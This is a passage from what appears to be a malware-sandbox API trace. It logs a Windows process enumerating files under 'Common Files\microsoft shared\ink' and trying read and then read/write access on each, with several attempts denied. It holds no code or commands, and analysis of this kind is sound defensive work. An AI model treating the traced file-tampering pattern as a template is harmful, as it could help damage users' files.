hHeap=0x20000) returned 1 [0083.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0083.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0083.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x604a8 [0083.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0083.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0083.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x604a8 | out: hHeap=0x20000) returned 1 [0083.968] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.968] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.968] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.968] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0083.968] AreFileApisANSI () returned 1 [0083.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR", lpUsedDefaultChar=0x0) returned 57 [0083.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0083.968] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.968] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0083.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0083.969] AreFileApisANSI () returned 1 [0083.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0083.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0083.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR") returned 57 [0083.969] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.969] GetLastError () returned 0x5 [0083.969] GetLastError () returned 0x5 [0083.969] SetLastError (dwErrCode=0x5) [0083.969] GetLastError () returned 0x5 [0083.969] SetLastError (dwErrCode=0x5) [0083.969] GetLastError () returned 0x5 [0083.969] SetLastError (dwErrCode=0x5) [0083.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0083.969] AreFileApisANSI () returned 1 [0083.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0083.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0083.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR") returned 57 [0083.969] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.969] GetLastError () returned 0x5 [0083.969] GetLastError () returned 0x5 [0083.969] SetLastError (dwErrCode=0x5) [0083.969] GetLastError () returned 0x5 [0083.969] SetLastError (dwErrCode=0x5) [0083.970] GetLastError () returned 0x5 [0083.970] SetLastError (dwErrCode=0x5) [0083.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0083.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0083.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0083.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0083.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0083.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0083.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0083.970] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06d0656, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0083.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0083.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0083.970] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78190 [0083.970] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cfce2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.970] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c3a52f7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3c3a52f7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3c3a52f7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0083.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0083.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0083.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0083.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0083.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46438 [0083.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0083.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0083.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0083.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0083.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0083.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0083.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0083.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0083.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0083.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0083.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0083.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0083.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0083.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.971] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.971] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.971] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.971] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.971] AreFileApisANSI () returned 1 [0083.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0083.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0083.971] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.971] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0083.972] AreFileApisANSI () returned 1 [0083.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0083.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85b20 [0083.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x85b20, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui") returned 73 [0083.972] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.972] GetFileType (hFile=0x42c) returned 0x1 [0083.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85b20 | out: hHeap=0x20000) returned 1 [0083.972] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.972] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.973] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.973] CloseHandle (hObject=0x42c) returned 1 [0083.973] AreFileApisANSI () returned 1 [0083.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0083.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x858a0 [0083.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x858a0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui") returned 73 [0083.973] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.973] GetLastError () returned 0x5 [0083.973] GetLastError () returned 0x5 [0083.973] SetLastError (dwErrCode=0x5) [0083.973] GetLastError () returned 0x5 [0083.973] SetLastError (dwErrCode=0x5) [0083.973] GetLastError () returned 0x5 [0083.973] SetLastError (dwErrCode=0x5) [0083.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x858a0 | out: hHeap=0x20000) returned 1 [0083.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0083.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.974] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⠀")) returned 0 [0083.974] FindClose (in: hFindFile=0x78190 | out: hFindFile=0x78190) returned 1 [0083.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0083.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0083.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0083.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0083.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0083.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0083.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0083.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0083.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0083.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0083.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0083.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0083.974] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.974] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.974] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.974] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0083.974] AreFileApisANSI () returned 1 [0083.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU", lpUsedDefaultChar=0x0) returned 57 [0083.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0083.975] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.975] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.975] AreFileApisANSI () returned 1 [0083.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0083.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0083.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU") returned 57 [0083.975] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.975] GetLastError () returned 0x5 [0083.975] GetLastError () returned 0x5 [0083.975] SetLastError (dwErrCode=0x5) [0083.975] GetLastError () returned 0x5 [0083.975] SetLastError (dwErrCode=0x5) [0083.975] GetLastError () returned 0x5 [0083.975] SetLastError (dwErrCode=0x5) [0083.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0083.975] AreFileApisANSI () returned 1 [0083.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0083.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0083.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU") returned 57 [0083.976] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.976] GetLastError () returned 0x5 [0083.976] GetLastError () returned 0x5 [0083.976] SetLastError (dwErrCode=0x5) [0083.976] GetLastError () returned 0x5 [0083.976] SetLastError (dwErrCode=0x5) [0083.976] GetLastError () returned 0x5 [0083.976] SetLastError (dwErrCode=0x5) [0083.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0083.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 